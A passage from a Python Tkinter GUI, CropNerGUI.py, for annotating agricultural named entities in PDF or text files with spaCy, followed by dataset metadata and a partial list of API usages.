self.msg.config(text=\"A larger page number was entered first. The pages will be displayed in order from smallest to largest anyway.\", foreground=\"red\")\n placeholder = self.page_number[0]\n self.page_number[0] = self.page_number[1]\n self.page_number[1] = placeholder\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, str(self.page_number[0]) + \"-\" + str(self.page_number[1]))\n self.chunk=self.page_number[0]\n\n def is_spaced_range(self, raw_page_entry: str):\n \"\"\"\n Checks to see if a page entry is simply two numbers separated by a space, which\n the program should handle as a range of pages.\n \n Lots of processing of page_entry is done both before and after this method is\n called. It will never be called on an entry with zany spacing, and it can be\n wrong when it comes to invalid inputs since they'll get filtered out anyway.\n \"\"\"\n first_space = raw_page_entry.find(\" \")\n # If there is one space...\n if(not(first_space == -1)) and (first_space == raw_page_entry.rfind(\" \")):\n # And if this space is surrounded by only two valid, positive digits...\n if(raw_page_entry[0 : first_space].isdigit() and raw_page_entry[first_space+1 :]):\n return True\n return False\n\n def clean_spaces_in_page_entry(self, raw_page_entry: str):\n \"\"\"\n Removes extra spaces. Then it checks to see if a user entered a range separated with\n spaces and replaces the spaces with a dash if so.\n \"\"\"\n old_entry = raw_page_entry.strip() # Remove loading and trailing spaces so that something like \" 2 5\" gets loaded as \"2-5\" instead of \"25\"\n # Remove all spaces that are adjacent to a dash or a space\n # The below line is straight from GeeksForGeeks, they're wonderful\n all_spaces = [i for i in range(len(old_entry)) if old_entry.startswith(\" \", i)]\n entry = \"\"\n for i in range(0, len(old_entry)):\n if not(i in all_spaces):\n entry = entry + old_entry[i] \n elif not(old_entry[i-1] == \"-\" or old_entry[i+1] == \"-\" or old_entry[i+1] == \" \"):\n entry = entry + old_entry[i]\n # Past this point, only single spaces that aren't next to a dash should exist.\n if(self.is_spaced_range(entry)):\n self.msg.config(text=\"You have entered two numbers with spacing in between. Loading those pages and the pages between them.\", foreground=\"orange\")\n entry = entry.replace(\" \", \"-\")\n # Replace user entry with how the program has read it.\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, entry)\n return entry\n\n def load_page_from_button(self, event=None):\n \"\"\"\n Loading the page can cause warnings to pop on on the bottom, especially with ranges.\n If you press \"load data\" and the warning from your last page load is still there, it\n can look like you just got an error even though you didn't. Thus, pressing the button\n to load the page first clears any warnings.\n \"\"\"\n self.msg.config(text=\"\")\n self.load_page()\n\n def load_page(self):\n \"\"\"\n Load contents of a PDF or text file into text box.\n\n If the entry box for page number has a value, it will load the page specified. If not, by default it will\n load the first page.\n \"\"\"\n # TODO: Currently only loads 1 page. Update to load arbitrary number of pages (max=size of document).\n # TODO: Give users the option to load text files in addition to pdf files.\n # TODO: Update self.annotation_file. This become an issue if a user opened an annotation file and then decides\n # to annotate a new page. The old annotation file name will be in self.annotation_file which can result in a\n # user overwriting the file\n\n if self.raw_file is None:\n self.msg.config(text=\"No raw data file has been selected. Please select a file to load.\", foreground=\"red\")\n\n # Reset annotation dictionary\n self.cust_ents_dict = {}\n\n # Delete contents\n self.text.delete(1.0, tk.END)\n\n # Calls pyxpdf in case the file is a PDF, otherwise reads as txt\n if self.file_mode == \"pdf\":\n page_num = self.clean_spaces_in_page_entry(self.page_entry.get())\n page_num_valid = self.page_num_is_valid(page_num)\n if page_num_valid == False:\n self.msg.config(text=\"Valid page number not entered. Value initialized to 1\", foreground=\"red\")\n self.page_number = 1\n self.page_entry.delete(0,tk.END)\n self.page_entry.insert(0, str(self.page_number))\n self.chunk=self.page_number\n elif page_num_valid == True:\n self.page_number = int(page_num)\n self.chunk=self.page_number\n else: # Range of numbers\n self.handle_page_range(page_num)\n\n # Load PDF file\n if self.pdf_document is None:\n self.pdf_document = Document(self.raw_file.name)\n\n self.handle_bad_page_requests(page_num_valid)\n\n if not (page_num_valid == -1): # Single page, whether page_num_valid is true or false\n page = self.pdf_document[self.page_number - 1]\n # \f doesn't necessarily have to be removed for a single page; It gets removed in\n # the else because tagging across multiple pages doesn't work correctly if \f exists.\n # However, it's removed here as well for consistency and neatness.\n txt = page.text().replace(\"\\r\", \"\").replace(\"\f\", \"\")\n else: # Page range\n txt = \"\"\n for page in self.pdf_document[self.page_number[0] - 1 : self.page_number[1]]:\n txt = txt + page.text().replace(\"\\r\", \"\").replace(\"\f\", \"\")\n else:\n self.page_number = 0\n self.chunk = self.page_number\n txt = self.raw_file.read().replace(\"\\r\", \"\").replace(\"\f\", \"\")\n self.raw_file.seek(0)\n\n self.text.insert(1.0,txt)\n return txt\n\n def update_scrolled_text_line_content_index(self):\n \"\"\"\n Populate the dictionary self.scrolled_text_line_content_index with position indices for the first and\n last characters in each line in the text box.\n\n Trying to figure out where entities are on scrollTextbox is a little tricky because tKinter uses newline\n characters to split text. Here we are keeping track of how many characters appear before a line in the\n GUI. This should make it easier to figure out where a token is given its\n start and end indices. Given (Steveland/Luther//Wintermalt 1001 1029 PED) named entity, we know the first\n character is at position 1001 and the last character is at position 1029. Question is, where is it in the\n textbox? This dictionary will have line number as the key and a tuple\n (index of first char in line, index of last char in line) as values e.g., {1: (0, 113), 2: (114, 228). This\n dictionary tells you the first line has the first 113 characters and the second line has characters starting\n with index 114 up to index 228.\n \"\"\"\n input_text = self.text.get(1.0, \"end\")\n lines = input_text.splitlines()\n line_no = 1\n num_char = 0\n for line in lines:\n line_len = len(line)\n interval = (num_char, num_char + line_len)\n self.scrolled_text_line_content_index[line_no] = interval\n num_char = num_char + line_len + 1 # The 1 we are adding is for newline character\n line_no = line_no + 1\n\n def highlight_ent(self, start_char: int, end_char: int, label: str):\n \"\"\"\n Given the start index and end index of a named entity, highlight it in the text box.\n\n Expects the dictionary (self.scrolled_text_line_content_index) with indices for characters in each line in\n the text box to be specified. The label for the named entity needs to have been added to\n self.text.tag_configure.\n \"\"\"\n line_start = -1\n char_start = -1\n line_end = -1\n char_end = -1\n # Loop through lines in the text field and find where this tag is.\n for key, value in self.scrolled_text_line_content_index.items():\n (start, end) = value\n if start_char >= start:\n line_start = key\n char_start = start_char - start\n if end_char <= end and line_start > 0:\n line_end = key\n ent_num_char = end_char - start_char\n if line_start == line_end:\n char_end = char_start + ent_num_char\n else:\n char_end = end_char - start\n break\n\n self.text.tag_add(label, str(line_start) + \".\" + str(char_start), str(line_end) + \".\" + str(char_end))\n\n def pre_tag(self, selection: str):\n \"\"\"\n Pre-tag selected content or all the text in text box with NER tags.\n\n Parameters\n ----------\n selection : str\n String specifying the type tagging to be done.\n\n If a user has selected a block of text and clicked the \"Pre-Tag Selection\" button, the selected text will be\n tagged and annotation displayed in the text box.\n\n If they clicked the \"Pre-Tag Pages(s)\" button, all the text loaded in the text box will be annotated.\n \"\"\"\n # Clear warning message, if one exists\n self.msg.config(text=\"\")\n\n # Checks if there is an active NER model\n if self.model_dir is None:\n self.msg.config(text=\"Warning!! Unable to pre-tag. No NER model selected.\", foreground=\"red\")\n # Pre-tag with NER model\n else:\n if selection == \"selection\":\n if (len(self.text.tag_ranges(\"sel\")) > 0):\n input_text = self.text.get(\"sel.first\", \"sel.last\")\n else:\n self.msg.config(text=\"No selection detected; no text was tagged.\", foreground=\"red\")\n return\n else:\n if self.raw_file is None:\n self.msg.config(text=\"Warning!! No PDF or txt file was detected. Attempting to tag what's currently in the text box.\", foreground=\"red\")\n # Will pre-tag whatever's in the current text box without trying to load data.\n input_text = self.text.get(1.0, \"end\")\n else:\n input_text = self.load_page()\n\n if not self.json_initialized:\n self.initialize_new_file() \n\n self.text.delete(1.0, tk.END)\n self.text.insert(1.0, input_text)\n\n # Reset annotation dictionary\n self.cust_ents_dict = {}\n\n # Update variable that holds number of lines in textbox. You need this for\n # the function highlight_ent to work\n self.update_scrolled_text_line_content_index()\n doc = self.tag_ner_with_spacy(input_text)\n\n custom_tags_present = False\n\n if type(self.page_number) is list:\n page_start = self.page_number[0]\n else:\n page_start = self.page_number\n\n for ent in doc.ents:\n # NER is in our list of custom tags\n if ent.label_ in self.tags:\n custom_tags_present = True\n # index = self.tags.index(ent.label_) # Find index for an element in a list\n self.highlight_ent(ent.start_char, ent.end_char, ent.label_)\n if self.cust_ents_dict.get(page_start, False):\n self.cust_ents_dict[page_start].append((ent.start_char, ent.end_char, ent.label_))\n else:\n self.cust_ents_dict[page_start] = [(ent.start_char, ent.end_char, ent.label_)]\n\n if not custom_tags_present:\n self.msg.config(text=\"No custom agriculture tags detected in the text!\", foreground=\"red\")\n if len(doc.ents) == 0:\n self.msg.config(text=\"No entities detected in the text!\", foreground=\"red\")\n\n if self.cust_ents_dict.get(page_start, False):\n tags = self.cust_ents_dict[page_start]\n self.cust_ents_dict[page_start] = [input_text, tags]\n\n def overlap(self, interval_one: list, interval_two: list) -> bool:\n \"\"\"\n Check to see if two intervals overlap.\n\n Parameters\n ----------\n interval_one : list[start1, end1]\n List containing two int values [start1, end1].\n\n interval_two : list[start2, end2]\n List containing two int values [start2, end2].\n\n Returns\n -------\n bool\n True if the intervals overlap and False otherwise.\n \"\"\"\n overlap = False\n interval_one_start = interval_one[0]\n interval_one_end = interval_one[1]\n\n interval_two_start = interval_two[0]\n interval_two_end = interval_two[1]\n\n if (interval_two_start >= interval_one_start) and (interval_two_start < interval_one_end):\n overlap = True\n elif (interval_two_end > interval_one_start) and (interval_two_end <= interval_one_end):\n overlap = True\n elif (interval_two_start <= interval_one_start) and (interval_two_end >= interval_one_end):\n overlap = True\n return overlap\n\n def initialize_new_file(self):\n self.json_initialized = True\n self.working_file_label.config(text=\"Working Annotation File: Untitled.json\")\n self.date_entry.config(state=tk.NORMAL)\n self.date_entry.delete(0, tk.END)\n self.date_entry.insert(0, datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\"))\n self.date_entry.config(state=tk.DISABLED)\n\n def get_selected_interval(self) -> tuple:\n \"\"\"\n Determines the index of the first and last characters (char_start, char_end) selected by the user.\n\n Returns\n -------\n tuple\n Indices of first and last characters selected (char_start, char_end) .\n \"\"\"\n\n selection_start_line = int(self.text.index(\"sel.first\").split(\".\")[0])\n tmp_selection_start = int(self.text.index(\"sel.first\").split(\".\")[1])\n selection_start = self.scrolled_text_line_content_index[selection_start_line][0] + tmp_selection_start\n\n selection_end_line = int(self.text.index(\"sel.last\").split(\".\")[0])\n tmp_selection_end = int(self.text.index(\"sel.last\").split(\".\")[1])\n selection_end = self.scrolled_text_line_content_index[selection_end_line][0] + tmp_selection_end\n result = (selection_start, selection_end)\n return result\n\n def get_ner(self, tag_label: str):\n \"\"\"\n Tag a piece of text that has been selected as a named entity.\n\n Parameters\n ----------\n tag_label : str\n Label to assign to the named entity that was selected.\n \"\"\"\n\n # Clear warning message, if one exists\n self.msg.config(text=\"\")\n try:\n # Get text\n input_text = input_text = self.text.get(1.0, \"end\")\n\n # Update variable that holds number of lines in textbox.\n self.update_scrolled_text_line_content_index()\n\n # Get indices for the first and last characters selected\n (ent_char_start, ent_char_end) = self.get_selected_interval()\n\n if self.cust_ents_dict.get(self.chunk,False):\n # Check to see if the current text matches the one we have in the annotation dictionary.\n # If not, warn the user about the conflict and make the update\n if input_text != self.cust_ents_dict[self.chunk][0]:\n self.msg.config(text=\"Warning!! Text in annotation dictionary was different. It has been updated\",\n foreground=\"red\")\n self.cust_ents_dict[self.chunk][0] = input_text\n\n # Check if selected area overlaps with another NER tag. If it does,\n # delete the existing tag. SpaCy does not allow NER tags to overlap.\n new_ents = []\n for (start, end, label) in self.cust_ents_dict[self.chunk][1]:\n if not self.overlap([ent_char_start, ent_char_end], [start, end]):\n new_ents.append((start, end, label))\n self.cust_ents_dict[self.chunk][1] = new_ents\n\n # Add the new NER tag into the dictionary\n self.cust_ents_dict[self.chunk][1].append((ent_char_start,ent_char_end, tag_label))\n else:\n self.initialize_new_file()\n self.cust_ents_dict[self.chunk] = [input_text, [(ent_char_start,ent_char_end, tag_label)]]\n\n # Highlight the new NER tag\n self.text.tag_add(tag_label, \"sel.first\", \"sel.last\")\n\n except tk.TclError:\n self.msg.config(text=\"Warning!! get_ner error.\", foreground=\"red\")\n\n def remove_tag(self):\n \"\"\"\n Untag a piece of text that was classified as a named entity.\n\n Extract the piece of text that was selected and remove it from the list of named entities.\n \"\"\"\n\n # Clear warning message, if one exists\n self.msg.config(text=\"\")\n\n # Get indices for the first and last characters selected\n try:\n (selection_start, selection_end) = self.get_selected_interval()\n except:\n self.msg.config(text=\"No selection detected!\", foreground=\"red\")\n return\n\n new_ents = []\n overlapping_tags = []\n input_text = self.cust_ents_dict[self.chunk][0]\n entities = self.cust_ents_dict[self.chunk][1]\n\n # Loop through tags and find ones that overlap with selected region and remove them.\n for (start, end, label) in entities:\n if not self.overlap([selection_start, selection_end], [start, end]):\n new_ents.append((start, end, label))\n else:\n overlapping_tags.append((start, end, label))\n if len(overlapping_tags) == 0:\n self.msg.config(text=\"Warning!! It appears the region you selected (\"+str(selection_start)+\n \"-\"+str(selection_end)+\") did not overlap with a tag.\", foreground=\"red\")\n else:\n for (start, end, label) in overlapping_tags:\n # Removes tag using the tag's actual indices instead of the selection's indices\n self.text.tag_remove(label, f\"1.0+{start}c\", f\"1.0+{end}c\")\n\n new_ents.sort()\n self.cust_ents_dict[self.chunk] = [input_text, new_ents]\n\n def get_custom_labels(self, data: dict):\n \"\"\"\n Given a dictionary representing the entirety of a json file generated by this program,\n this method finds every custom, user-defined label and loads them back into the program.\n \"\"\"\n labels = []\n for sentence_item in data['sentences']:\n for entity_item in data['sentences'][sentence_item]:\n label = data['sentences'][sentence_item][entity_item]['label']\n if (not (label in labels)) and (not (label in self.tags)):\n # If a new tag is found, essentially auto-fill the custom trait field and press the button to add a custom entity.\n labels.append(label)\n self.trait_entry.delete(0, tk.END)\n self.trait_entry.insert(0, label)\n self.add_ent()\n self.trait_entry.delete(0, tk.END)\n\n def review_annotations(self):\n \"\"\"\n Load a json file containing annotations and review it.\n\n It does not take as input any parameters, but it expects the variable that hold annotation\n file name (self.annotation_file) to have a valid json file value.\n \"\"\"\n\n # Clear warning message, if one exists\n self.msg.config(text=\"\")\n\n if self.annotation_file is None:\n self.msg.config(text=\"Please select an annotations file (json)\", foreground=\"red\")\n else:\n # Load annotation data\n try:\n data = json_2_dict(self.annotation_file.name)\n train_data = dict_2_mixed_type(data)\n self.get_custom_labels(data)\n except:\n self.msg.config(text=\"WARNING!!: Couldn't load data from annotation file. Are you sure you loaded a valid json?\", foreground=\"red\")\n self.annotation_file = None\n return\n \"\"\"\n doc = data['doc']\n url = data['url']\n \"\"\"\n\n # Updates the 'metadata' panel with information from json file, if info is different or invalid then the user is instructed to verify the data in a proper format.\n try:\n self.doc_entry.delete(0, tk.END)\n self.doc_entry.insert(0, data['doc'])\n self.url_entry.delete(0, tk.END)\n self.url_entry.insert(0, data['url'])\n self.date_entry.config(state=tk.NORMAL)\n self.date_entry.delete(0, tk.END)\n self.date_entry.insert(0, data['date'])\n self.date_entry.config(state=tk.DISABLED)\n except:\n self.msg.config(text=\"Error retrieving metadata; please verify metadata manually\", foreground=\"red\")\n self.date_entry.config(state=tk.NORMAL)\n\n\n self.chunk = int(data['chunk'])\n self.page_number = self.chunk\n\n # Empty text box so we can load annotations\n self.text.delete(1.0, tk.END)\n\n annotated_text = None\n entities = None\n\n # Annotation file that contains more than one text block\n if len(train_data) > 1:\n total_num_char = 0\n annotated_text = \"\"\n entities = []\n for text_annotation in train_data:\n annotated_text_tmp = text_annotation[0]\n entities_tmp = text_annotation[1]['entities']\n for ent_tmp in entities_tmp:\n entities.append((total_num_char + ent_tmp[0],total_num_char + ent_tmp[1], ent_tmp[2]))\n total_num_char = total_num_char + len(annotated_text_tmp) + 1\n annotated_text = annotated_text + annotated_text_tmp + \"\\n\"\n self.cust_ents_dict[self.chunk] = [annotated_text, entities]\n else:\n text_annotation = train_data[0]\n annotated_text = text_annotation[0]\n entities = text_annotation[1]['entities']\n self.cust_ents_dict[self.chunk] = [annotated_text,entities]\n\n self.text.insert(1.0, annotated_text + '\\n')\n\n # Update variable that holds number of lines in textbox. You need this update\n # for highlight_ent to work\n self.update_scrolled_text_line_content_index()\n\n for ent_val in entities:\n self.highlight_ent(ent_val[0],ent_val[1], ent_val[2])\n\n def clear_message(self):\n \"\"\"\n Clear warning message\n \"\"\"\n self.msg.config(text=\"\")\n\n def clear_data(self):\n \"\"\"\n Clear data in text box and dictionary containing annotations.\n \"\"\"\n # Clear annotations\n self.cust_ents_dict = {}\n\n # Clear warning message\n self.msg.config(text=\"\")\n\n # Clear content\n self.text.delete(1.0, tk.END)\n\n def remove_all_tags(self):\n \"\"\"\n Remove all the NER tags on text loaded in the text box.\n \"\"\"\n for tag in self.tags:\n self.text.tag_remove(tag, \"1.0\", \"end\")\n\n # Clear annotations\n self.cust_ents_dict = {}\n\n # Clear warning message\n self.msg.config(text=\"\")\n\n def tag_ner_with_spacy(self, text: str) -> spacy.tokens.Doc:\n \"\"\"\n Use NLP pipeline to identify named entities in the text.\n \"\"\"\n doc = self.nlp_agdata(text)\n return doc\n\n def file_save(self):\n \"\"\"\n Brings up a file dialog to choose a file name/location then saves annotations to it in .json format.\n \"\"\"\n\n if self.cust_ents_dict:\n # Opens a tkinter save as file dialog and stores the file to a var\n json_file = fd.asksaveasfile(initialfile=self.file_name.split(\".\")[0]+\"_pg\"+str(self.page_number)+\".json\", mode='w', defaultextension='.json')\n\n if json_file is None or json_file.name[-4:] != \"json\":\n self.msg.config(text=\"Invalid file or no file chosen; annotations not saved.\", foreground=\"red\")\n return\n else:\n self.annotation_file = json_file\n self.working_file_label.config(text=\"Working Annotation File: \"+str(self.annotation_file.name.split(\"/\")[-1]))\n\n input_text = self.cust_ents_dict[self.chunk][0]\n entities = self.cust_ents_dict[self.chunk][1]\n\n # Calls dict_2_json on the newly created json file\n ann_train_dict = mixed_type_2_dict([(input_text,{'entities': entities})], self.chunk, self.doc_entry.get(), self.url_entry.get(), self.date_entry.get())\n dict_2_json_file(ann_train_dict, json_file)\n\n json_file.close()\n self.msg.config(text=\"Data successfully saved!\", foreground=\"orange\")\n else:\n self.msg.config(text=\"No NER data detected to save\", foreground=\"red\")\n\n\n def next_page(self):\n \"\"\"\n Load the next page.\n \"\"\"\n if self.file_mode == \"pdf\":\n if len(self.cust_ents_dict) == 0:\n self.msg.config(text=\"Warning!! No annotations to save.\", foreground=\"red\")\n else:\n self.msg.config(text=\"\")\n # Save current annotation\n # Uncomment this for now. Initially it seemed like a good idea but there are a lot of\n # Instances where a user might not want to save annotations when they click next page\n # self.file_save()\n\n # Increment page number\n try:\n self.page_number = self.page_number + 1\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, str(self.page_number))\n\n # Reset annotation data\n self.annotation_file = None\n\n # Load data\n self.load_page()\n except TypeError:\n # While this would be easy to add, it's not clear what exactly SHOULD be incremented\n # if the user clicks \"next page\" on a range, so that's left to the user.\n self.msg.config(text=\"WARNING!! Cannot increment a range of pages.\", foreground=\"red\")\n else:\n self.msg.config(text=\"Warning!! No PDF is currently loaded, so the next page of it can't be loaded either.\", foreground=\"red\")\n\n def go(self):\n \"\"\"\n Start running the GUI running.\n \"\"\"\n self.rootWin.mainloop()\n\n def quit(self):\n \"\"\"\n Callback method attached to the quit button.\n\n It check for unsaved changes and opens a save dialog window, otherwise it destroys the main window, which ends the program\n \"\"\"\n # Creates a save dialog window if there are annotations in the workspace\n if self.cust_ents_dict:\n\n # Button for saving and quitting that invokes save dialog\n def save_and_quit():\n \"\"\"\n Callback method attached to the save and quit button in the save dialog window.\n \"\"\"\n self.file_save()\n self.rootWin.destroy()\n\n # Button for discaring changes and quitting\n def discard_and_quit():\n \"\"\"\n Callback method attached to the discard and quit button in the save dialog window.\n \"\"\"\n self.rootWin.destroy()\n\n self.save_dialog = tk.Toplevel(self.rootWin)\n label = tk.Label(self.save_dialog, text=\"You currently have annotations in the workspace. Would you like to save or discard them?\")\n label.pack(side=tk.TOP)\n savedialog_discard = tk.Button(self.save_dialog, text=\"Discard and Quit\", command=discard_and_quit)\n savedialog_discard.pack(side=tk.BOTTOM)\n savedialog_confirm = tk.Button(self.save_dialog, text=\"Save\", command=save_and_quit)\n savedialog_confirm.pack(side=tk.BOTTOM)\n else:\n self.rootWin.destroy()\n\n\n\n# Driver code\nif __name__ == \"__main__\":\n ner_gui = CropNerGUI()\n ner_gui.go()\n", "repo_name": "getiria-onsongo/IaaAgDataNER", "sub_path": "src/CropNerGUI.py", "file_name": "CropNerGUI.py", "file_ext": "py", "file_size_in_byte": 64512, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tkinter.Tk", "line_number": 158, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 186, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 187, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 191, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 192, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 215, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 216, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 220, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 222, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 226, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 227, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 230, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 231, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 232, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 235, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 236, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 239, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 239, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 240, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 243, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 244, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 248, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 249, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 252, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 253, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 256, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 257, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 260, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 261, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 264, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 265, "usage_type": "attribute"}, {"api_name": "tkinter.Entry", "line_number": 268, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 269, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 272, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 273, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 276, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 277, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 280, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 281, "usage_type": "attribute"}, {"api_name": "tkinter.scrolledtext.ScrolledText", "line_number": 285, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 287, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 290, "usage_type": "call"}, {"api_name": "tkinter.RIGHT", "line_number": 291, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 294, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 296, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 298, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 300, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 302, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 304, "usage_type": "call"}, {"api_name": "tkinter.CENTER", "line_number": 304, "usage_type": "attribute"}, {"api_name": "tkinter.DISABLED", "line_number": 306, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 317, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 318, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 320, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 321, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 323, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 324, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 326, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 327, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 329, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 330, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 332, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 333, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 335, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 336, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 338, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 339, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 342, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 343, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 345, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 346, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 349, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 350, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 352, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 353, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 355, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 356, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 357, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 359, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 361, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 363, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 364, "usage_type": "attribute"}, {"api_name": "tkinter.Entry", "line_number": 365, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 366, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 369, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 370, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 371, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 373, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 374, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 376, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 377, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 428, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 437, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 440, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 441, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 442, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 444, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 490, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 491, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 492, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 493, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 494, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 495, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 496, "usage_type": "attribute"}, {"api_name": "tkinter.TOP", "line_number": 498, "usage_type": "attribute"}, {"api_name": "tkinter.filedialog.askdirectory", "line_number": 519, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 519, "usage_type": "name"}, {"api_name": "spacy.tokens.load", "line_number": 526, "usage_type": "call"}, {"api_name": "spacy.tokens", "line_number": 526, "usage_type": "name"}, {"api_name": "spacy.tokens.load", "line_number": 532, "usage_type": "call"}, {"api_name": "spacy.tokens", "line_number": 532, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfile", "line_number": 566, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 566, "usage_type": "name"}, {"api_name": "tkinter.END", "line_number": 593, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 598, "usage_type": "attribute"}, {"api_name": "tkinter.LEFT", "line_number": 599, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 613, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 615, "usage_type": "attribute"}, {"api_name": "tkinter.NORMAL", "line_number": 616, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 617, "usage_type": "attribute"}, {"api_name": "tkinter.DISABLED", "line_number": 619, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 659, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 664, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 680, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 688, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 694, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 699, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 721, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 762, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 796, "usage_type": "attribute"}, {"api_name": 